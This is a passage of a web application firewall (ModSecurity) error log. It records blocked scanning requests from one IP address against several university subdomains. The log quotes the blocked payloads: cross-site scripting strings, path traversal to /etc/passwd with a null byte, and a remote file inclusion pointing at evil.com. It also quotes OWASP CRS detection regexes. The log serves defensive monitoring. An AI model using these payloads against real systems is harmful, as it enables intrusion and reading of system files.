"OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/search/"] [unique_id "ZO16PsCo-f0AAAqsV7oAAAAB"]
[Tue Aug 29 11:55:26.754554 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:q: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/search/"] [unique_id "ZO16PsCo-f0AAAolKpIAAAAe"]
[Tue Aug 29 11:55:27.901443 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:q: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/search/"] [unique_id "ZO16P8Co-f0AAAqY6D8AAAAr"]
[Tue Aug 29 11:55:27.904016 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/atmail/webmail/"] [unique_id "ZO16P8Co-f0AAAqeFW0AAAAx"]
[Tue Aug 29 11:55:28.541969 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:type: ../../../../../../../../../../../etc/./passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/horde/util/barcode.php"] [unique_id "ZO16QMCo-f0AAAolKpYAAAAe"]
[Tue Aug 29 11:55:28.568021 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:type: ../../../../../../../../../../../etc/./passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/horde/util/barcode.php"] [unique_id "ZO16QMCo-f0AAApXgp0AAAAU"]
[Tue Aug 29 11:55:28.571900 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:type: ../../../../../../../../../../../etc/./passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/horde/util/barcode.php"] [unique_id "ZO16QMCo-f0AAAqTvrsAAAAa"]
[Tue Aug 29 11:55:28.621287 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:type: ../../../../../../../../../../../etc/./passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/horde/util/barcode.php"] [unique_id "ZO16QMCo-f0AAAolKpgAAAAe"]
[Tue Aug 29 11:55:28.624876 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:type: ../../../../../../../../../../../etc/./passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/horde/util/barcode.php"] [unique_id "ZO16QMCo-f0AAAqSwt0AAAAN"]
[Tue Aug 29 11:55:29.642000 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:type: ../../../../../../../../../../../etc/./passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/horde/util/barcode.php"] [unique_id "ZO16QcCo-f0AAAoz8GgAAAAS"]
[Tue Aug 29 11:55:29.791162 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16QcCo-f0AAAqTvsEAAAAa"]
[Tue Aug 29 11:55:29.794828 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16QcCo-f0AAAqqtgYAAAAA"]
[Tue Aug 29 11:55:29.872633 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16QcCo-f0AAAqTvsQAAAAa"]
[Tue Aug 29 11:55:29.890627 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16QcCo-f0AAAqY6EgAAAAr"]
[Tue Aug 29 11:55:29.895320 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16QcCo-f0AAAqTvsUAAAAa"]
[Tue Aug 29 11:55:30.527822 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php"] [unique_id "ZO16QsCo-f0AAAqY6EkAAAAr"]
[Tue Aug 29 11:55:30.528058 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php"] [unique_id "ZO16QsCo-f0AAApXgrQAAAAU"]
[Tue Aug 29 11:55:30.547194 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php"] [unique_id "ZO16QsCo-f0AAApXgrUAAAAU"]
[Tue Aug 29 11:55:30.554518 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php"] [unique_id "ZO16QsCo-f0AAApHRhIAAAAP"]
[Tue Aug 29 11:55:30.671227 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16QsCo-f0AAAqSwuIAAAAN"]
[Tue Aug 29 11:55:30.673037 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16QsCo-f0AAAqTvskAAAAa"]
[Tue Aug 29 11:55:30.690204 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16QsCo-f0AAAqeFX8AAAAx"]
[Tue Aug 29 11:55:30.708837 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16QsCo-f0AAAqY6E4AAAAr"]
[Tue Aug 29 11:55:30.709014 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16QsCo-f0AAAqSwuQAAAAN"]
[Tue Aug 29 11:55:30.711018 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16QsCo-f0AAApHRhYAAAAP"]
[Tue Aug 29 11:55:30.711669 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php"] [unique_id "ZO16QsCo-f0AAAqTvssAAAAa"]
[Tue Aug 29 11:55:31.591738 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://evil.com found within TX:1: evil.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/html/common/forward_js.jsp"] [unique_id "ZO16Q8Co-f0AAApXgrkAAAAU"]
[Tue Aug 29 11:55:31.593523 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://evil.com found within TX:1: evil.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/html/common/forward_js.jsp"] [unique_id "ZO16Q8Co-f0AAAqY6FAAAAAr"]
